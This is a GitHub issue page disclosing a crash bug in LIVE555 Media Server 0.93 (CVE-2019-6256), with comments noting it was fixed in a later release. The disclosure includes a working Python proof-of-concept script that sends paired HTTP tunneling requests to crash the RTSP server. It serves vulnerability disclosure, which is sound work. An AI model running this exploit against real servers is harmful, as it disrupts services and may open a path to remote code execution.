Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is a Denial of service attack issue that can cause program to crash in LIVE555 Media Server version 0.93. #19

Closed
DshtAnger opened this issue Jan 14, 2019 · 3 comments
Closed

There is a Denial of service attack issue that can cause program to crash in LIVE555 Media Server version 0.93. #19

DshtAnger opened this issue Jan 14, 2019 · 3 comments

Comments

@DshtAnger
Copy link

DshtAnger commented Jan 14, 2019
edited

ISSUE DESCRIPTION

The project website : http://www.live555.com/liveMedia/

I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported.

I only need to send two HTTP requests in one TCP connection.

The problem occurrs in RTSPServer.cpp:853 , it calls handleHTTPCmd_TunnelingPOST.

If I send a HTTP GET packet with a specific sessionCookie firstly, then I send a HTTP POST packet with this sessionCookie in the same TCP connection.

RTSPServer will call a error virtual function pointer in readSocket function(GroupsockHepler.cpp) and the pointer value comes from heap which may control.

Attack PoC python code:

from socket import *
target_ip = REMOTE_SERVER_IP
target_port = 554  # or 8554

tcp = socket(AF_INET,SOCK_STREAM)
tcp.connect((target_ip,target_port))

http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''

http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''

tcp.send(http_request_GET)
data = tcp.recv(1024)

tcp.send(http_request_POST)
tcp.close()

You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.

Original vulnerability discoverer:
许彬彬 Xubinbin

IMPACT

It will cause dos attack and potential remote command execution in version 0.93(I verified) , even all earlier versions (This is just my unverified guess).
@nluedtke
Copy link

This was assigned CVE-2019-6256.

@carnil
Copy link

carnil commented Jan 19, 2019

According to the Debian maintainer in https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=919529#17 does not seem to be present in current versions.

What was the fix for the issue?

@DshtAnger
Copy link
Author

DshtAnger commented Jan 21, 2019
edited

According to the Debian maintainer in https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=919529#17 does not seem to be present in current versions.

What was the fix for the issue?

Ross Finlayson [finlayson@live555.com] told me that the problem has been fixed in version 2018.11.26.
Users only need to update the version.
Reference:http://www.live555.com/liveMedia/public/changelog.txt

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@carnil @nluedtke @DshtAnger